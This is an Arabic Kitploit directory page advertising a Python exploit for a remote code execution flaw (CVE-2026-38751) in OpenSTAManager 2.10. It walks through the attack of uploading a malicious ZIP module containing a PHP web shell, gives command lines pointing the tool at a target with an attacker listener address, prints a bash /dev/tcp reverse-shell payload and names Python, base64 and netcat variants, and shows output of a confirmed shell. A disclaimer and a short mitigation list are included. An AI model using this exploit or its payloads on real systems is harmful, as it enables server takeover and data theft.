Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
OpenSTAManager_RCE_Exploit-CVE-2026-38751- — استغلال تنفيذ التعليمات البرمجية عن بُعد في OpenSTAManager (CVE-2026-38751) | Kitploit
أدوات/GitHubGitHub/hackthem/openstamanager_rce_exploit-cve-2026-38751-
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعدتوليد شيفرة القشرة
GitHubhackthem/openstamanager_rce_exploit-cve-2026-38751-

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

OpenSTAManager_RCE_Exploit-CVE-2026-38751-

استغلال تنفيذ التعليمات البرمجية عن بُعد في OpenSTAManager (CVE-2026-38751)

عرض المستودع
16منذ 2 أشهرلم تتم المراجعة بعد
مشاركة

استغلال OpenSTAManager للتنفيذ عن بُعد (RCE) (CVE-2026-38751)

نظرة عامة

يستغل هذا السكربت المكتوب بلغة Python ثغرة تنفيذ الأكواد عن بُعد (Remote Code Execution) في OpenSTAManager الإصدار 2.10، والمعروفة بـ CVE-2026-38751. يسمح هذا الاستغلال للمستخدمين المصادَق عليهم برفع وحدة خبيثة وتنفيذ أوامر تعسفية على النظام المستهدف.

تفاصيل الثغرة

  • معرف CVE: CVE-2026-38751
  • المنتج: OpenSTAManager
  • الإصدار: 2.10
  • النوع: تنفيذ الأكواد عن بُعد (RCE)
  • ناقل الهجوم: قائم على الويب، ويتطلب مصادقة صالحة

كيف يعمل الاستغلال

يتبع الاستغلال الخطوات التالية:

  1. المصادقة: تسجيل الدخول إلى تطبيق OpenSTAManager باستخدام بيانات الاعتماد المقدَّمة
  2. تفعيل التحديثات: تفعيل وظيفة تحديث الوحدات المطلوبة للاستغلال
  3. إنشاء ملف ZIP خبيث: يُنشئ ملف ZIP يحتوي على:
    • ملف تعريف وحدة (MODULE)
    • سكربت شل PHP (shell.php) ينفذ الأوامر عبر معامل GET باسم c
  • رفع الوحدة: رفع ملف ZIP الخبيث عبر واجهة تحديث الوحدات
  • التحقق من الاستغلال: التأكد من أن الشل قابل للوصول ويعمل بشكل صحيح
  • تنفيذ الأوامر: إما:
    • وضع شل تفاعلي لتنفيذ الأوامر يدويًا
    • اتصال شل عكسي لإنشاء اتصال دائم
  • المتطلبات الأساسية

    • Python 3.x
    • حزم Python المطلوبة: requests, zipfile
    • بيانات اعتماد إدارية صالحة لـ OpenSTAManager
    • وصول شبكي إلى النظام المستهدف

    طريقة الاستخدام

    الاستخدام الأساسي

    root@kitploit:~
    python3 exploit.py -u http://target.com -U admin -P password
    

    وضع الشل التفاعلي

    root@kitploit:~
    python3 exploit.py -u http://target.com -U admin -P password --interactive
    

    وضع الشل العكسي

    root@kitploit:~
    python3 exploit.py -u http://target.com -U admin -P password --lhost 10.10.14.180 --lport 4444
    

    الوسائط

    الوسيطالوصف
    -u, --urlعنوان URL الهدف (مطلوب)
    -U, --userاسم المستخدم للمصادقة (مطلوب)
    -P, --passwordكلمة المرور للمصادقة (مطلوب)
    --interactiveالدخول إلى وضع الشل التفاعلي
    --no-cleanupعدم إزالة ملفات الشل بعد التنفيذ
    --lhostالمضيف المحلي للشل العكسي
    --lportالمنفذ المحلي للشل العكسي

    التفاصيل الفنية

    عملية الاستغلال

    1. المصادقة: يرسل السكربت طلب تسجيل دخول إلى نقطة نهاية المصادقة في التطبيق
    2. تفعيل تحديث الوحدات: يرسل طلب POST لتفعيل وظيفة تحديث الوحدات
    3. إنشاء ملف ZIP: يُنشئ أرشيف ZIP يحتوي على:
      • shell/MODULE: ملف إعدادات الوحدة
      • shell/shell.php: ويب شل PHP ينفذ الأوامر المُمرَّرة عبر معامل GET باسم c
    4. عملية الرفع: يستخدم بيانات نموذج multipart لرفع ملف ZIP الخبيث إلى نقطة نهاية تحديث الوحدات
    5. التحقق: يختبر الشل المرفوع عن طريق تنفيذ أمر بسيط مثل id للتأكد من أنه يعمل
    6. تنفيذ الأوامر: إما توفير شل تفاعلي أو إنشاء اتصال شل عكسي

    الحمولات المستخدمة

    يحاول الاستغلال استخدام عدة حمولات للشل العكسي:

    • شل عكسي بـ Bash: bash -i >& /dev/tcp/{lhost}/{lport} 0>&1
    • شل عكسي بـ Python باستخدام اتصالات socket
    • حمولة Bash مشفرة بـ Base64
    • شل عكسي عبر Netcat

    الاعتبارات الأمنية

    ⚠️ إخلاء مسؤولية: هذا الاستغلال مخصص للأغراض التعليمية واختبارات الأمان المصرح بها فقط.

    تقييم المخاطر

    تتيح هذه الثغرة:

    • تنفيذ أكواد تعسفية بصلاحيات مستخدم خادم الويب
    • احتمال تصعيد الصلاحيات
    • الوصول إلى البيانات الحساسة المخزنة على النظام
    • إمكانية الحركة الجانبية داخل الشبكة

    التخفيف

    للحماية من هذه الثغرة:

    1. تحديث OpenSTAManager إلى أحدث إصدار
    2. تنفيذ ضوابط مصادقة مناسبة
    3. تقييد إمكانيات رفع الملفات
    4. مراقبة الأنشطة المشبوهة
    5. تطبيق تقسيم الشبكة

    مثال على المخرجات

    root@kitploit:~
    [ OpenSTAManager RCE Exploit : ]
    
    Target: http://target.com
    [*] Step 1: Login...
    [+] Login successful: admin
    [*] Step 2: Enable updates...
    [+] Updates enabled
    [*] Step 3: Create ZIP...
    [*] Created in-memory ZIP file
    [*] Shell location: /modules/shell/shell.php
    [*] Step 4: Upload...
    [*] Upload status: 200
    [+] Upload successful
    [*] Step 5: Verify...
    [+] Vulnerability confirmed!
    [+] Shell: http://target.com/modules/shell/shell.php
    [+] Test: http://target.com/modules/shell/shell.php?c=whoami
    
    [*] Entering interactive mode...
    cmd> whoami
    www-data
    cmd> exit
    

    المراجع

    • مستودع GitHub
    • تفاصيل CVE

    الترخيص

    يُقدَّم هذا الاستغلال للأغراض التعليمية فقط. يُعد الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها أمرًا غير قانوني.

    تنزيل الأداة